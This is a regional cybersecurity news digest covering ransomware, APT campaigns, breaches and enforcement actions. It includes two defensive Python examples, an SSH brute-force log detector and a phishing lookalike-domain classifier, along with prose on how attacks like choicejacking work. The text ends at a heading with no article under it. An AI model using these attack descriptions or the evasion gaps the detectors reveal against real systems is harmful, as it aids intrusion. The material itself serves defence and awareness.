Summary of the Incident Report
Ransomware, phishing, and nation-state cyber operations dominated headlines globally. Sri Lanka's Pensions Department was hit by ransomware, though no data loss occurred. In India, APT36 intensified attacks on critical infrastructure, while authorities busted a ₹840 crore sextortion scam in Gurgaon and seized 7,000 fake SIMs in Assam. China-linked and Pakistan-linked APTs targeted Czech and Indian systems respectively. Across Africa, Microsoft launched a cybersecurity initiative, and Ghana arrested foreign nationals for cyber fraud. Iranian group Cyber Toufan employed custom backdoors for espionage. In Australia, legal professionals' banking data was leaked due to a third-party breach. The UK faced multiple data breaches, including NHS trusts and Legal Aid. The U.S. issued new AI data security guidelines and witnessed attacks on ScreenConnect and MATLAB. Mobile malware and cookie theft dominated Latin America, with damages in billions. Bangladesh enforced new cyber laws, and Indonesia emphasized cyber defense policy. Globally, cybercrime sophistication and frequency are rising rapidly.
Asia & ASEAN
Pensions Department Hit by Ransomware Attack; No Data Loss Reported
Sri Lanka's Department of Pensions fell victim to a ransomware attack, disrupting its internal systems temporarily. Despite the attack, officials confirmed that no data was lost, and the department's primary operations have resumed. Authorities suspect that threat actors attempted to encrypt internal data but were unsuccessful, thanks to timely containment measures. The department emphasized that its data backups remained intact, mitigating the potential impact. Investigations are ongoing to determine the attack's origin and scope. The incident highlights vulnerabilities in public sector cybersecurity and has triggered a nationwide review of digital defense protocols. Officials reassured pensioners that their payments and personal data are secure. As ransomware attacks continue to rise globally, experts urge public agencies to enhance cyber resilience by adopting regular security audits, employee awareness training, and stronger network segmentation. The incident serves as a wake-up call for other Sri Lankan institutions that may lack adequate preparedness against such cyber threats.
Minister Urges Stronger Cybersecurity for National Defense
Indonesia's Coordinating Minister for Political, Legal, and Security Affairs, Hadi Tjahjanto, has called for robust cybersecurity measures to protect the country's defense and critical infrastructure. Amid increasing global cyber threats, the minister stressed the urgency of strengthening cybersecurity policies and systems. He emphasized the need for improved collaboration between government agencies, military, law enforcement, and the private sector to build a unified defense against cyberattacks. The call to action follows recent incidents highlighting vulnerabilities in national systems and underscores Indonesia's aim to elevate its cyber readiness. Tjahjanto also underlined the importance of public awareness and digital literacy to prevent exploitation by malicious actors. The government plans to bolster cyber regulations and promote investment in cybersecurity technology and skilled personnel. This initiative forms part of Indonesia's broader strategy to safeguard its sovereignty in the digital era, especially as geopolitical tensions increasingly translate into cyber operations targeting national defense mechanisms.
Earth LAMIA Hackers Exploit Vulnerabilities
A threat group tracked as Earth LAMIA is actively exploiting both known and previously undisclosed (zero-day) vulnerabilities in public-facing services and internet-exposed appliances. The campaign, targeting organizations across Asia, Latin America, and the Middle East, uses a custom malware toolkit for espionage. Attackers gain initial access through vulnerable servers, then deploy multiple backdoors and evasion techniques to maintain persistence and exfiltrate sensitive data. The group shows mature operational tradecraft, using encrypted command-and-control traffic and lateral movement within compromised networks. Researchers assess Earth LAMIA to be state-sponsored because of its focus on long-term surveillance and geopolitical targets. Victims span government entities, telecommunications providers, and defense contractors. The campaign's success is attributed to poor patch management and misconfigured systems. Organizations are advised to prioritize patching of internet-facing assets, segment networks, and monitor for signs of compromise. The operation exemplifies the increasing complexity of cyber-espionage and the need for proactive defense in critical sectors.
APT36 SideCopy Hackers Attack India's Critical Infrastructure
SideCopy, an activity cluster associated with the Pakistan-linked espionage group APT36 (also tracked as Transparent Tribe), has intensified its campaigns against India's critical infrastructure sectors. Using targeted spear-phishing, the attackers distribute malicious payloads disguised as government or defense-related documents. Once a host is compromised, they deploy custom Remote Access Trojans (RATs) that give full control of the infected system. The group primarily targets defense personnel, research institutions, and power utilities, aiming to exfiltrate sensitive strategic data. Security researchers note that the tooling has become more sophisticated, with payloads built to evade signature-based antivirus. The infrastructure behind the campaign suggests a well-resourced operation, likely backed by a state. The activity reflects growing regional cyber tensions and the deliberate targeting of vital national sectors. Indian cybersecurity agencies are on high alert and urge organizations to adopt layered defenses: user awareness programs, zero-trust architectures, and rigorous endpoint monitoring to counter the persistent and evolving threat posed by SideCopy.
251 Malicious IPs Attacking Cloud-Based Devices
Cybersecurity researchers have identified 251 unique malicious IP addresses actively targeting cloud-based devices across various sectors. The ongoing campaign leverages automated tools to scan and exploit vulnerable instances of services like SSH, RDP, and web applications. These IPs are involved in credential brute-forcing, exploitation of known vulnerabilities, and deployment of malware aimed at cryptojacking or establishing remote access. The attackers appear to be part of several botnets operating from different global regions, often using compromised systems as launch points. Enterprises running inadequately secured cloud deployments are especially vulnerable, particularly small to mid-sized businesses without dedicated IT security teams. The report urges organizations to implement security best practices, including enforcing strong authentication, disabling unused services, and conducting regular vulnerability assessments. As cloud adoption surges, threat actors are increasingly focusing on these platforms due to their accessibility and misconfiguration risks. The discovery underscores the need for continuous monitoring and proactive threat mitigation strategies.
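The credential brute-forcing described above leaves a recognisable trail in the SSH daemon's authentication log. The following is an added example, not code from the report or from the researchers it cites: a sliding-window detector over syslog-style sshd lines that flags sources crossing a failure threshold and any later successful login from such a source. The log lines are constructed samples, and the threshold and window size are assumed values to be tuned per environment. The second run in the usage block widens the window to show the low-and-slow case that a short window misses.

```python
"""Sliding-window detector for SSH credential brute-forcing.

Added example, not from the original report. Parses syslog-style sshd lines,
counts failed logins per source address inside a time window, and reports
sources that cross a threshold as well as any later successful login from a
source already flagged (a likely credential-stuffing hit). SAMPLE_LOG is a
constructed sample; threshold and window are assumed values to tune locally.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_LOG = """\
May 28 10:00:01 web1 sshd[2201]: Failed password for root from 203.0.113.10 port 51022 ssh2
May 28 10:00:02 web1 sshd[2203]: Failed password for invalid user admin from 203.0.113.10 port 51023 ssh2
May 28 10:00:03 web1 sshd[2205]: Failed password for root from 203.0.113.10 port 51024 ssh2
May 28 10:00:04 web1 sshd[2207]: Failed password for invalid user oracle from 203.0.113.10 port 51025 ssh2
May 28 10:00:05 web1 sshd[2209]: Failed password for root from 203.0.113.10 port 51026 ssh2
May 28 10:00:09 web1 sshd[2211]: Accepted password for deploy from 203.0.113.10 port 51030 ssh2
May 28 10:01:00 web1 sshd[2301]: Failed password for alice from 198.51.100.7 port 40011 ssh2
May 28 10:01:30 web1 sshd[2302]: Accepted publickey for alice from 198.51.100.7 port 40012 ssh2
May 28 10:05:00 web1 sshd[2401]: Failed password for root from 192.0.2.55 port 60001 ssh2
May 28 10:09:00 web1 sshd[2402]: Failed password for root from 192.0.2.55 port 60002 ssh2
May 28 10:13:00 web1 sshd[2403]: Failed password for root from 192.0.2.55 port 60003 ssh2
May 28 10:17:00 web1 sshd[2404]: Failed password for root from 192.0.2.55 port 60004 ssh2
May 28 10:21:00 web1 sshd[2405]: Failed password for root from 192.0.2.55 port 60005 ssh2
"""

# Matches the two sshd outcomes we care about. "invalid user" marks a guess at
# an account that does not exist, which is typical of wordlist-driven scanning.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse(line, year=2025):
    """Return (timestamp, result, user, ip) or None for lines we do not handle.
    Syslog timestamps carry no year, so one is supplied (assumed here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect(log_text, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failures inside window_seconds.

    Returns {"brute_force": {ip: [usernames tried]},
             "success_after_burst": [(ip, user), ...]}.
    """
    recent = defaultdict(deque)  # ip -> (timestamp, user) pairs inside the window
    flagged = {}
    hits = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        if result == "Failed":
            q = recent[ip]
            q.append((ts, user))
            while q and (ts - q[0][0]).total_seconds() > window_seconds:
                q.popleft()  # drop attempts that have aged out of the window
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = sorted({u for _, u in q})
        elif result == "Accepted" and ip in flagged:
            hits.append((ip, user))  # a success from a source that was guessing
    return {"brute_force": flagged, "success_after_burst": hits}


if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
    print(detect(SAMPLE_LOG, window_seconds=1800))  # also catches the slow source
```

With the default one-minute window only 203.0.113.10 is flagged, and its later successful login as `deploy` is reported as a probable credential hit. 192.0.2.55 spaces its guesses four minutes apart and is only caught when the window is widened to 30 minutes; choosing the window is the trade-off between catching low-and-slow guessing and raising alerts on users who mistype a password a few times.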
Silver RAT Malware With New Anti-Virus Bypass Techniques
A new variant of the Silver RAT malware has emerged, showcasing advanced antivirus evasion tactics to enhance persistence and stealth. This version is equipped with polymorphic capabilities, allowing it to modify its code structure dynamically, thereby bypassing signature-based detection. Silver RAT facilitates full remote access, enabling attackers to execute commands, steal credentials, capture keystrokes, and exfiltrate files from infected systems. Distributed via phishing emails and cracked software downloads, the malware has been observed targeting both corporate and individual users. Its obfuscation techniques include encrypted payload delivery, sandbox evasion, and runtime unpacking. Security experts warn that this evolution in malware sophistication poses a significant challenge for traditional endpoint protection solutions. They recommend employing behavior-based detection mechanisms, user privilege restrictions, and frequent system audits to counter such threats. The rise of Silver RAT exemplifies the ongoing arms race between malware developers and security vendors and calls for constant innovation in defense technologies.
Velvet Chollima APT Hackers Attacking Government Officials
The North Korean-linked APT group Velvet Chollima is conducting targeted cyberattacks against high-ranking government officials across Asia and Europe. These campaigns involve spear-phishing emails laden with malicious attachments that deliver stealthy malware capable of espionage and system manipulation. The malware tools include custom Remote Access Trojans (RATs) and data exfiltration frameworks designed for stealth and persistence. Velvet Chollima's focus appears to be intelligence gathering, particularly related to diplomatic, military, and economic activities. The group employs sophisticated social engineering tactics to gain the trust of their targets, often impersonating journalists, researchers, or officials. Cybersecurity experts believe the campaign is part of North Korea's broader cyber strategy to overcome economic sanctions and gain geopolitical leverage. The attacks demonstrate a high level of technical expertise and operational discipline. Authorities urge increased vigilance and investment in threat detection systems, especially in government and diplomatic sectors vulnerable to state-sponsored cyber espionage activities.
Massive Cyberattacks Highlight the Need for Countries to Increase Investment in Digital Security
A wave of massive cyberattacks targeting public and private sectors has reignited discussions on the need for greater investment in digital security infrastructure worldwide. These attacks, which have disrupted transportation systems, healthcare services, and critical utilities, reveal serious shortcomings in national cyber resilience. Experts attribute the surge in attacks to the increasing reliance on digital systems and the lag in updating outdated cybersecurity policies. Many affected countries lack sufficient funding, skilled personnel, and coordination between public agencies and private firms. The article underscores the urgent requirement for a strategic cybersecurity roadmap that includes workforce training, public awareness, and stricter regulatory standards. As cyber warfare becomes an extension of geopolitical conflict, governments are called to treat digital infrastructure as essential to national security. The incidents highlight a global consensus: cyber preparedness must match the scale of digital transformation, and investments in digital defenses are no longer optional but imperative for stability.
Korea Needs to Do More to Prevent Repeat of KT's Network Outage: Minister
In response to a recent major network outage at KT Corporation, South Korea's Minister of Science and ICT emphasized the urgent need for enhanced cybersecurity and infrastructure resilience. The outage disrupted internet services, financial transactions, and emergency communications, raising serious concerns about the robustness of national telecom infrastructure. The Minister criticized the company's lack of preparedness and called for stricter regulatory oversight and mandatory cybersecurity audits for telecom providers. A comprehensive investigation revealed vulnerabilities in KT's internal systems and inadequate incident response protocols. The incident has spurred discussions on setting up national guidelines for handling cyber incidents and outages. Experts advocate for the establishment of a centralized command center for real-time monitoring and response coordination. The government plans to work closely with private ISPs to reinforce system redundancies and improve recovery strategies. This incident serves as a case study in how digital infrastructure failures can severely impact a nation's economy and security.
Bangladesh Launches National Online Gambling Enforcement Under New Cyber Law
The Bangladeshi government has launched a nationwide crackdown on online gambling operations under its newly enacted Cyber Security Act. This move aims to curb the rise of illegal gambling platforms that have proliferated across social media and encrypted messaging apps. Authorities are leveraging advanced digital forensics, financial transaction tracking, and IP monitoring to identify and prosecute offenders. The new legislation empowers law enforcement with greater authority to block websites, seize assets, and arrest operators. Officials stress that online gambling poses significant risks to national financial security and social well-being, as many platforms are tied to money laundering and organized crime. The campaign is also part of a broader initiative to clean up cyberspace, promote lawful digital activities, and protect vulnerable citizens from digital exploitation. As implementation proceeds, the government is engaging with telecom operators and fintech firms to ensure compliance. The enforcement marks a significant step toward establishing comprehensive digital governance in Bangladesh.
Phishing Plot Busted: 7,000 Fake SIMs, 265 Arrests in Morigaon Raid Spree
In a large-scale operation in Morigaon, Assam, Indian authorities dismantled a massive phishing network involving over 7,000 fake SIM cards and arrested 265 individuals. The suspects used these SIMs to carry out fraudulent activities, including banking scams, identity theft, and illegal online transactions. The operation, led by local police and supported by cybercrime units, uncovered a sophisticated racket involving SIM card cloning, document forgery, and the use of mule accounts. The scale and coordination of the criminal network suggest possible links to inter-state or even international syndicates. Law enforcement agencies are now analyzing seized devices and data to trace higher-level operators. This crackdown highlights the growing abuse of digital identity infrastructure and calls for stricter KYC compliance and telecom sector regulation. Authorities have pledged continued efforts to combat cyber fraud, and the public is urged to remain vigilant about digital communications and suspicious financial activities in their accounts.
Chinese and Malaysian Nationals Arrested Over Suspected Cyber Crime Activities in Weija
Ghanaian security forces have arrested several Chinese and Malaysian nationals in Weija over their alleged involvement in cybercrime activities. The suspects were caught during a coordinated operation based on intelligence regarding online fraud schemes originating from a private residence. Authorities seized dozens of electronic devices, SIM cards, and laptops believed to be used for phishing, identity theft, and illegal financial transfers. Preliminary investigations suggest the group was part of a larger transnational cybercrime syndicate targeting victims across Africa and Asia. The arrests underscore the increasing international dimension of cybercrime and the need for cross-border collaboration in cyber law enforcement. Ghanaian officials have reiterated their commitment to strengthening cybersecurity frameworks and cracking down on digital crimes. The incident has raised awareness about foreign criminal infiltration and the use of local infrastructure for global scams. It also highlights the growing relevance of cyber vigilance as a component of national security and economic protection.
Pacific & Oceania
Fortinet Rolls Out Free Cybersecurity Curriculum in Australian Schools
Fortinet has introduced a free cybersecurity curriculum for Australian schools, aiming to address the critical skills gap in the nation's cybersecurity workforce. Delivered through the Fortinet Training Institute, the program targets high school students and integrates cybersecurity education into the general curriculum. It includes modules on foundational cyber principles, digital ethics, threat identification, and cyber hygiene. The initiative aligns with Australia's broader push to build cyber resilience from the ground up by developing early awareness and capabilities. Fortinet partners with local education authorities to ensure the material meets national standards and is accessible to all regions, including underserved communities. The program is designed to inspire future careers in cybersecurity and bolster national defense by cultivating a generation of digitally savvy individuals. This proactive educational strategy comes amid rising cyber threats and the global shortage of skilled cybersecurity professionals, reinforcing the importance of early engagement in technology-focused learning pathways.
Threat Actors Using Aggressive New Extortion Tactics: Report
A recent cybersecurity report reveals that cybercriminals are adopting increasingly aggressive extortion tactics, particularly in ransomware operations. Threat actors are now employing "double" and "triple" extortion methods — stealing data before encryption and threatening to leak it or launch DDoS attacks if victims don't pay. These tactics amplify pressure on organizations, especially in sectors like healthcare, education, and critical infrastructure, where public exposure can have devastating consequences. The report also notes the rise of "harassmentware," where attackers directly contact executives, customers, or partners to force payment. Criminal groups are becoming more organized and business-like, using negotiation teams and dedicated data leak sites. These developments underscore the shift in ransomware from simple encryption to comprehensive data exploitation strategies. Experts urge companies to enhance incident response capabilities, conduct regular backups, and invest in cyber insurance. The findings highlight a disturbing evolution in cybercrime — one that requires more than just technical defenses but also legal and strategic readiness.
Bank Details of Lawyers, Judges at Risk in Cyberattack
A cyberattack on a third-party provider has exposed the sensitive banking information of Australian lawyers, judges, and other legal professionals. The breach affected the Legal Practice Board of Western Australia, which manages professional records for the state's legal sector. Attackers reportedly accessed documents containing bank account details, addresses, and identification data of hundreds of legal practitioners. The incident has raised concerns about the vulnerability of regulatory bodies and their third-party vendors. Investigations are ongoing, with cybersecurity agencies and law enforcement working to assess the full extent of the damage. Legal institutions across the country have been alerted to the potential risk, and affected individuals are urged to monitor their accounts and credit reports for signs of fraud. The breach underscores the importance of supply chain security and robust cyber governance among entities handling professional and financial data. It also renews calls for mandatory breach disclosure and risk audits in the legal sector.
WA's Legal Practice Board Hack Sees Bank Details of Legal Firms Stolen as Police Investigate Cyber Incident
Western Australia's Legal Practice Board has confirmed that a cyber incident has led to the theft of bank account details from numerous legal firms, prompting a police investigation. The breach is believed to have originated from a compromised third-party provider's system, which stored financial and personal data related to legal practitioners and firms. Affected parties include small and medium-sized legal operations across WA, raising fears about potential fraud and financial loss. The board has begun notifying impacted firms while urging all stakeholders to implement precautionary cybersecurity measures. Authorities have not yet disclosed the identity of the threat actors, but early assessments suggest the attack was financially motivated. The incident has triggered calls for stronger digital oversight in the legal industry, particularly around third-party data management. As investigations continue, the case serves as a reminder of the cascading risks associated with vendor vulnerabilities and the need for comprehensive cybersecurity practices in professional services.
Europe & UK
NHS Trusts Impacted by Cyberattack with Patient Data Stolen
Multiple NHS trusts in the UK have been impacted by a recent cyberattack resulting in the theft of sensitive patient data. The breach, reportedly linked to a third-party service provider, has raised serious concerns about data security across the healthcare sector. While the National Health Service confirmed that its core systems remain operational, the compromised data may include confidential medical records, patient correspondence, and internal documents. The attackers have not yet been officially identified, but experts suspect a financially motivated ransomware group. Authorities are currently investigating the breach and working to assess the scope of the stolen data. The Information Commissioner's Office and National Cyber Security Centre have been alerted and are coordinating the response. This incident has reignited calls for healthcare organizations to enhance cybersecurity measures, particularly in their vendor management practices. Patients have been advised to remain vigilant for identity theft or fraud attempts as investigations continue.
Czech Republic Attributes Cyberattacks to China-Linked APT Group
The Czech Republic has officially attributed a series of cyberattacks on government and defense institutions to a China-linked Advanced Persistent Threat (APT) group. According to the Czech intelligence and cybersecurity agencies, the group exploited vulnerabilities in Microsoft Exchange servers to gain access and conduct espionage operations. The campaign, which began in 2023, involved long-term infiltration and data exfiltration activities aimed at gathering sensitive political and defense-related information. Czech authorities stated that the attacks were coordinated and persistent, suggesting state-sponsored origins. This marks one of the strongest public attributions by a European nation toward Chinese threat actors. In response, the Czech government is strengthening its cyber defense posture, engaging international allies, and calling for collective action within the EU and NATO. The Chinese embassy in Prague has denied the allegations, while security experts underscore the importance of robust detection systems and international cooperation to combat such high-level cyber threats.
Ransomware Gang Claims Mediclinic Cyberattack, Threatens Data Leak
A ransomware group known as "INC Ransom" has claimed responsibility for a cyberattack on Mediclinic, one of the largest private hospital groups operating in South Africa and other regions. The attackers allegedly exfiltrated a significant volume of sensitive data, including patient records and internal documents, and are threatening to leak the stolen information unless a ransom is paid. Mediclinic has acknowledged the incident and stated that its operations remain largely unaffected, though investigations are ongoing. The group behind the attack has published evidence of the breach on their dark web site, escalating pressure on the healthcare provider. Cybersecurity experts warn that such attacks against healthcare organizations are becoming increasingly common, given the high value of medical data and the urgency associated with patient care. Authorities are working to contain the breach and assess its impact while urging healthcare institutions to invest in modern cybersecurity frameworks and ransomware mitigation strategies.
Regulatory Compliance Emerging as a Critical Driver of Cybersecurity Strategies
As cyber threats continue to evolve, regulatory compliance has become a crucial factor shaping cybersecurity strategies for organizations worldwide. Businesses are now compelled to align their security frameworks with regional and industry-specific regulations such as GDPR, HIPAA, PCI-DSS, and others to avoid hefty fines and reputational damage. Experts highlight that compliance requirements increasingly influence decisions on data encryption, access control, incident response, and risk assessments. Cybersecurity professionals are leveraging compliance audits not just as checklists but as opportunities to identify and close security gaps. However, the complexity and diversity of global regulations pose challenges for multinational organizations, especially in managing cross-border data flows. A growing trend involves integrating regulatory requirements into automated security workflows to streamline governance and ensure real-time compliance. The report concludes that organizations treating compliance as a proactive risk management tool, rather than a legal obligation, are better positioned to defend against cyber threats and build stakeholder trust.
Choicejacking Attacks Exploit UI Design to Manipulate User Behavior
"Choicejacking" is the name given by academic researchers in 2025 to an attack on the consent prompts that mobile operating systems show when a phone is plugged into a charger or other USB host. The protections introduced against "juice jacking" rely on the user tapping "Allow" before a charger can open a data connection; a choicejacking charger defeats that by emulating an input device and injecting the input that answers the prompt on the user's behalf, after which it obtains file access or a debugging channel. The flaw is in the UI design rather than in a single software bug: the prompt assumes that input arriving while it is on screen comes from the device's owner, so the user's choice can be made for them. Platform vendors have responded by requiring the device to be unlocked or the user to authenticate before a new USB data connection is accepted, but those changes reach devices only through operating-system updates. Until then the practical advice is unchanged: charge from your own adapter or a power-only cable, and treat any unexpected data-access prompt from a charger as an attack.
Sandbox Analysis Significantly Enhances Three Key SOC Metrics
Security Operations Centers (SOCs) are reporting marked improvements in performance metrics following the integration of sandbox analysis into their threat detection and response workflows. According to a recent study, sandboxing technologies — used to safely detonate and analyze suspicious files — have helped SOCs enhance mean time to detect (MTTD), mean time to respond (MTTR), and threat detection accuracy. Analysts note that real-time behavior analysis within sandbox environments allows for deeper insights into malware characteristics, enabling faster and more confident decisions. This reduces false positives and accelerates the response process. Additionally, automated sandbox integration with SIEM and SOAR tools has streamlined the investigative workflow, freeing up analysts for higher-level threat hunting. Organizations adopting sandbox analysis also report better threat attribution and incident documentation. Experts recommend sandboxing as a critical component of modern cybersecurity infrastructure, particularly for environments dealing with high volumes of unknown or complex threats.
Hackers Mimic Popular Antivirus Sites to Distribute Malware
Cybercriminals are creating spoofed versions of popular antivirus software websites to distribute malware disguised as legitimate security tools. These fake sites closely replicate the design, branding, and even domain structures of genuine antivirus vendors to deceive users into downloading malicious installers. Once executed, the malware — often information stealers or remote access trojans — compromises the victim's device and exfiltrates sensitive data. In some cases, attackers also use search engine optimization (SEO) poisoning to promote these fraudulent sites in search results, increasing the likelihood of user interaction. The tactic exploits the trust users place in well-known cybersecurity brands, making it particularly effective. Security experts advise users to verify URLs, avoid clicking on ads or suspicious links in search engines, and download software only from official vendor websites. Organizations are encouraged to educate employees about this rising threat and implement web filtering tools to prevent access to malicious domains mimicking trusted security providers.
Craft CMS Vulnerability Exploited by Hackers to Inject Malicious Code
A critical vulnerability in Craft CMS is being actively exploited by hackers to inject malicious code into vulnerable websites. The flaw, which affects specific versions of the content management system, allows remote attackers to execute arbitrary PHP code via poorly sanitized input fields. Once exploited, attackers can gain persistent access, modify site content, or redirect users to phishing pages. Security researchers note that the exploit is relatively easy to execute, making it a prime target for automated attack tools. Craft CMS has released a patch addressing the issue, and administrators are urged to update their installations immediately. Unpatched instances remain at risk of compromise, particularly those with exposed administrative panels. Website operators are also encouraged to conduct code audits, monitor logs for unusual behavior, and enforce strong input validation practices. This incident highlights the importance of timely patching and security hardening in widely used content management systems.
XenServer VM Tools Windows Vulnerability Exposes Systems to Elevation of Privilege
A vulnerability has been disclosed in XenServer VM Tools for Windows that allows privilege escalation inside guest virtual machines. Tracked under a CVE identifier, the flaw stems from improper handling of file permissions during the VM Tools installation process. An attacker with a low-privileged account on the guest could leverage it to execute arbitrary code with elevated privileges within that guest. The issue matters most in multi-tenant environments such as cloud or shared-hosting platforms, where many guests run the same tools. Citrix, which maintains XenServer, has issued a security advisory and released updated versions of the software. Administrators are advised to patch immediately, restrict which guest users can reach the VM Tools installation directory, and monitor for indicators of misuse. The disclosure underscores the need for hypervisor-level security and routine review of the agents installed inside virtual machines.
UK Legal Aid Data Breach Exposes Millions of Sensitive Records
A significant data breach affecting the UK's Legal Aid Agency has resulted in the exposure of millions of confidential records, sparking public outcry and scrutiny of the Ministry of Justice's cybersecurity practices. The breach, reportedly caused by inadequate access controls and outdated systems, exposed sensitive information including legal case files, financial data, and personal identifiers of clients and legal professionals. Critics have slammed the government's failure to modernize its cybersecurity infrastructure despite previous warnings and audits. While the agency has launched an internal investigation and is cooperating with the Information Commissioner's Office, there is growing concern over potential identity theft and misuse of legal information. Cybersecurity experts emphasize the urgency of implementing zero-trust frameworks and regular security audits in public sector institutions. The incident also raises broader questions about data governance and accountability in government-managed systems that handle sensitive public data.
Hackers Exploit SimpleHelp RMM Tool to Deploy Malware
Cybercriminals are actively exploiting a vulnerability in the SimpleHelp Remote Monitoring and Management (RMM) tool to deploy malware on enterprise systems. According to cybersecurity researchers, attackers are using the tool's remote access capabilities to install backdoors, execute scripts, and exfiltrate data undetected. The exploitation typically begins with phishing campaigns or brute-force attacks to gain administrative access, after which the compromised RMM instance is used as a launchpad for lateral movement and malware deployment across the network. Because RMM tools have high privileges and network-wide visibility, they are prime targets for threat actors seeking maximum impact. Experts warn that misuse of such legitimate software tools is difficult to detect without behavior-based monitoring. Organizations are advised to update SimpleHelp to the latest version, enforce strong access controls, and continuously monitor RMM activity for anomalies. This incident is part of a larger trend where attackers weaponize IT management tools to bypass traditional defenses.
Threat Actors Impersonate DocuSign in Phishing Campaign to Steal Credentials
A new phishing campaign is targeting users by impersonating DocuSign, the widely used electronic signature platform, in an attempt to steal login credentials and sensitive documents. The attackers send fake email notifications claiming a document needs immediate signing, with a link that leads to a counterfeit login page. Unsuspecting users who enter their credentials unknowingly hand over access to threat actors, who then use the information for identity theft or further intrusions into corporate systems. Security researchers warn that this campaign is well-crafted, using accurate branding and legitimate-sounding domains to enhance its credibility. Businesses that frequently use DocuSign are at higher risk, especially if employees are not trained to spot phishing attempts. Experts advise enabling multi-factor authentication (MFA), verifying sender domains, and educating staff about common phishing red flags. As impersonation-based attacks become more refined, robust email filtering and user vigilance are critical for preventing credential theft.
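The advice above to verify sender domains is easy to state and easy to get wrong, because a lookalike domain passes a naive "contains the brand name" check. The following is an added example (not from the original report and not DocuSign's own code) of a sender-domain classifier that a mail gateway or triage script could apply: it extracts the domain from a From: header, compares it against a trusted-domain allowlist, and flags three common impersonation patterns: punycode (non-ASCII homoglyph) labels, the brand name embedded in an unrelated registrable domain, and small-edit-distance typosquats. The allowlist and the sample headers are assumptions constructed for the example.

```python
import hashlib  # not used for the check itself; kept out of the path below
from email.utils import parseaddr

# Constructed allowlist for this example. In production this comes from your own
# policy store, not from a hard-coded set.
TRUSTED_DOMAINS = {"docusign.com", "docusign.net"}
BRAND = "docusign"


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance, used to spot one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,          # deletion
                           cur[j - 1] + 1,       # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def sender_domain(from_header: str) -> str:
    """Return the lower-cased domain part of the address in a From: header, or ''."""
    _, addr = parseaddr(from_header)
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def classify_sender(from_header: str) -> str:
    """Classify a From: header as trusted, unknown, or suspicious with a reason."""
    domain = sender_domain(from_header)
    if not domain:
        return "reject: no address"
    if domain in TRUSTED_DOMAINS:
        return "trusted"
    # An xn-- label means the domain contains non-ASCII characters: the usual
    # vehicle for homoglyph lookalikes (Cyrillic 'o' for Latin 'o', and so on).
    if any(label.startswith("xn--") for label in domain.split(".")):
        return "suspicious: internationalized domain"
    # Brand name present anywhere in a domain we do not trust, e.g. the brand as a
    # subdomain of an attacker's registrable domain, or brand-secure-login.example.
    if BRAND in domain:
        return "suspicious: brand name in untrusted domain"
    # Within two edits of a trusted domain: a typosquat such as docusing.com.
    for trusted in sorted(TRUSTED_DOMAINS):
        if edit_distance(domain, trusted) <= 2:
            return "suspicious: lookalike of " + trusted
    return "unknown"


if __name__ == "__main__":
    # Constructed sample headers; none of these addresses is a real observed sender.
    samples = [
        "DocuSign <dse@docusign.net>",
        "DocuSign <noreply@docusing.com>",
        "DocuSign <notify@docusign.com.evil.example>",
        "DocuSign <sign@xn--docusgn-example.com>",
        "Bob <bob@example.org>",
    ]
    for header in samples:
        print(f"{header!r:50} -> {classify_sender(header)}")
```

The classifier is a triage signal, not a verdict: "unknown" senders still need the usual SPF/DKIM/DMARC evaluation, and "trusted" only means the domain matches the allowlist, which is why the check must run on the authenticated envelope or header domain rather than on the display name an attacker controls.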
MathWorks Confirms Ransomware Attack; Adidas, Dutch Intelligence Also Impacted by Cyber Incidents
MathWorks, the developer of MATLAB and Simulink, has confirmed a ransomware attack that temporarily disrupted its operations. The company stated that it is working with cybersecurity experts to investigate the breach and has taken measures to restore affected systems. Concurrently, Adidas faced a data breach impacting customer information, although details remain limited. Meanwhile, Dutch intelligence agencies have issued a warning about an increased likelihood of state-sponsored cyberattacks targeting critical infrastructure, particularly from Russia and China. These events highlight a surge in cyber incidents affecting both corporate and government sectors. Experts attribute the rise to escalating geopolitical tensions and an expanding threat landscape involving ransomware, data theft, and espionage. Organizations are urged to bolster their cyber defenses, conduct frequent risk assessments, and adopt advanced detection systems. The incidents reflect a broader trend of highly coordinated cyberattacks aimed at disrupting operations, stealing intellectual property, and undermining public trust in digital systems.
USA & Canada
Nova Scotia Power Warns of Scammers Exploiting Cyberattack Confusion
Following a cyberattack on its IT systems, Nova Scotia Power is cautioning customers about a surge in scam attempts. The utility company, part of Emera Inc., confirmed that while the attack did not affect electricity supply or customer data, threat actors are capitalizing on public concern by impersonating company officials. Scammers are reportedly contacting customers via phone, email, and social media, demanding payments or requesting sensitive information under false pretenses. Nova Scotia Power has emphasized it will never ask for personal or banking details through unsolicited communication. The province's privacy commissioner and local law enforcement have been alerted, and investigations are ongoing. While IT systems are gradually being restored, the incident has raised broader concerns about cyber resilience and the exploitation of crisis situations by fraudsters. Authorities are urging the public to remain vigilant, verify communications, and report any suspicious activity, underlining how cyberattacks can trigger widespread secondary fraud risks.
ConnectWise Confirms ScreenConnect Cyberattack, Claims Systems Now Secure
